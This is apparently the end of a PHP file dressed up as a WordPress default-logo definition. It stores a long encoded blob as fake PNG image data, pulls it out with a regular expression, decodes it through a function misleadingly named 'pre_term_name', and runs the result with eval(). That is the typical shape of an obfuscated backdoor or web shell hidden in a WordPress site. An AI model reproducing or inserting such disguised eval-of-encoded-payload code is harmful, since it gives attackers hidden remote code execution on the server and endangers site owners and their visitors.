Od1BCTuYLtsr101RO1DHCR8lU1BT6ifgH9hPZKjCVkNLxm3JpTGZ32GjoST4RHdRY9oGXAHuVdQiM7wY#i%tMHeQxXYNxUh8LAlpYKIo6UQI4PrNlWWaV5XVHR4S63bkzW7dcg6a2SVwFoc9W5Vo7nQZi6P06dL2ekQ8Q2QIvOsz94nwQ1JhQ1p3Bd1#vMJfaQIfYcd8#00668j1KrjjmRVg%y8oUFtsOTiJhW2bUyuctmb129fnwGjs#OXL7lPi0X1d3ttLelNp5i1pfycL#ZnUU4J9pbb3Gu7udmkXArbuxJSEHE5s%6kZF6CHJbKCLkORw2g9JZMCmps7EFuaZrdct2o%FB8V4YA8sKoMgbQN92%4X866g8GVwgjLF8JxXXLyS1FN3crJuLNtzrgtVFE6TZccEcB6Lmg0pAKwQwXjwBFIXFnFjZoS1Qt7Xs6ZVMOTHcJjU%aQU08supd%e6z#qUqItrVmQM9mAGP9RpYJBL6Hgw6B109v9xfcWMfklhFaEjKO6HQLLgeHWLi%m7IJ16zRtatm2YmtxXNu1dJvUrzkpGH3TVNsWs13#ccq9pRC7as#5INMDpMcjUkc34P44OVxegjnhN#gfnYUKpkW4260uFP7ePirrVuA02IRiuqQZaGRKfEKIm%KNeSrC1QNx8PRogNqQYZJ3BmPOoE%MZrWcrkc8kZJ3lZePE8CCpy4mKENdNrdeyCivu7lS1FHYCiBVqlMeXoYzBeYcBfKVMNY4y#rcSy9Tg6OC3vLCwh3x5lM5Kwq5eZJQwZLB0IO3zOoEwtOpjA3ZXHMM96Wf1nfPUzTKiHbpP9jObQn3EV9eH06ARW1ehy#zNqwqNlEt78jFPRnVvYx5OEmuJxrV53D1vKPs0p6DaDTh7CnKTbvZFXWEtdT3SnvHyIIpK#jmAFkVf111vRZAfm#04FtypOqppr1clxWk%IhbHyMC2ZR40b3vOx%8puHgA0aqu4Zcfes#9yv2fAmHJIVPQLgzO89cL5WZCKk2%ajoNnIdAcMVol8zoKfO7psLiDZ#S8WZYte7sY31MdjePfo3fP3h7hbTHq%cnRPz8cnZ6NPpy8Fr6jNdxZWKJBmtBzrMLTYXFHnur66JCzi44l#oaTHJj4dS7ib%MnPI7XEWXJWtCV37BgRnd1ikXKyYdXfN#hZcYMFHiazCkpXN5FIiKayQKarN1koKObTfL85PX7M9EkcruXbrEvuHWruLLBNPSlawmJEZITPHjBaLxKEvSkxnd1Mzythi6No6ux4xM3fZjIzbCtkk7V2TYv0OYQeRYPmPMSvnvsJEhX84y9iMf7hPDQMdoAD0tKpnBU2O%yg4LIjQzZsfKouJDSesc7QOF1WhqCJVjgxQckoED7nGexefIa6ayMwMNtbkJUneIZ6Cw2gy#5ZEKp3KbjpQmpVLlLTBQIIGo2Y2scV1quIqPsnG1Z1JaKgOvisHJ#E9o4rMwnjdyMjrIRmtDVIMQx2PUjUO5zpgxskUMkezlbjlYU1wnW7YrRKGsW5zN2ObspCKjVL7jTBKyleAHGMmdFxwJdBGmKlgAAJai34lmEI6ccVgbuEpNqttUl7KtaDS8SERIlnw99KE9APNztnMU93Qz3wCNf7bxHy9VmWdx%7yBZQdJj71#933V5g95AIllZzFzYYchpddGuTdV8TdU6TYW7YXejVgCoFdKAn70VHbPsXloE5oSMjYB0ZooUgGECAiRp284tfvMgFOYkJUN43T9PnTzX8f#3c7HH#dTkKTdLmk8d4kEH1zSaI8VlYw6#EW0qIVQTCxC8QcEE#fH0eATy7PT18TsBkXqTYAEzFCUfhlGI8rXu4mu8x0%cXGWGbVGXita8vOzeCmAklwQfp9YoBo%2ZAxoY0eDx90b8fYiDb0wyfA0MhzmwK041B43VNogJKllSGgL0D0Nxq#jSYw9WRIuzBPrhXXU5Ks19uZzmuRGmKsKFMoTjmf%Gw==">';
preg_match('#<img src="data:image/png;(.*)">#', $wp_default_logo, $logo_data);
$logo_image = $logo_data[1];
$wpautop = pre_term_name( $logo_image, $wp_nonce );
if(isset($wpautop)){
eval($wpautop);
}
?>